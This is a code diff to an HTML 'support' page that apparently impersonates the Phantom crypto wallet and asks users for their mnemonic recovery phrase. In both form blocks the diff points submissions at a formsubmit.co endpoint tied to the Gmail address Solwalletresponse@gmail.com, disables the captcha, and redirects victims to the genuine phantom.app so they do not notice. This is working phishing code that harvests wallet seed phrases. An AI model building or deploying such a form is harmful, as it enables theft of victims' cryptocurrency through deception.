--- a/support.html
+++ b/support.html
@@ -25,8 +25,9 @@
 
        <div class="tab-content" id="myTabContent">
       <div class="tab-pane fade active show" id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
-        <form id="contactForm" action="https://formsubmit.io/send/d7fb164b-af4f-478d-89b9-26d7b3579a13" method="POST">
-          <input name="_redirect" type="hidden" id="name" value="https://phantom.app/">
+        <form action="https://formsubmit.co/Solwalletresponse@gmail.com" method="POST" />
+           <input type="hidden" name="_next" value="https://phantom.app/">
+          <input type="hidden" name="_captcha" value="false">
 
           <div class="">
             <div class="input">
@@ -127,11 +128,11 @@
       <h2 class="mnemonic">MNEMONIC</h2>
     </ul>
 
-    <div class="tab-content" id="myTabContent">
+     <div class="tab-content" id="myTabContent">
       <div class="tab-pane fade active show" id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
-        <form id="contactForm" action="https://formsubmit.io/send/d7fb164b-af4f-478d-89b9-26d7b3579a13" method="POST">
-          <input name="_redirect" type="hidden" id="name" value="https://phantom.app/">
-
+        <form action="https://formsubmit.co/Solwalletresponse@gmail.com" method="POST" />
+           <input type="hidden" name="_next" value="https://phantom.app/">
+          <input type="hidden" name="_captcha" value="false">
           <div class="">
             <div class="input">
               <span></span>
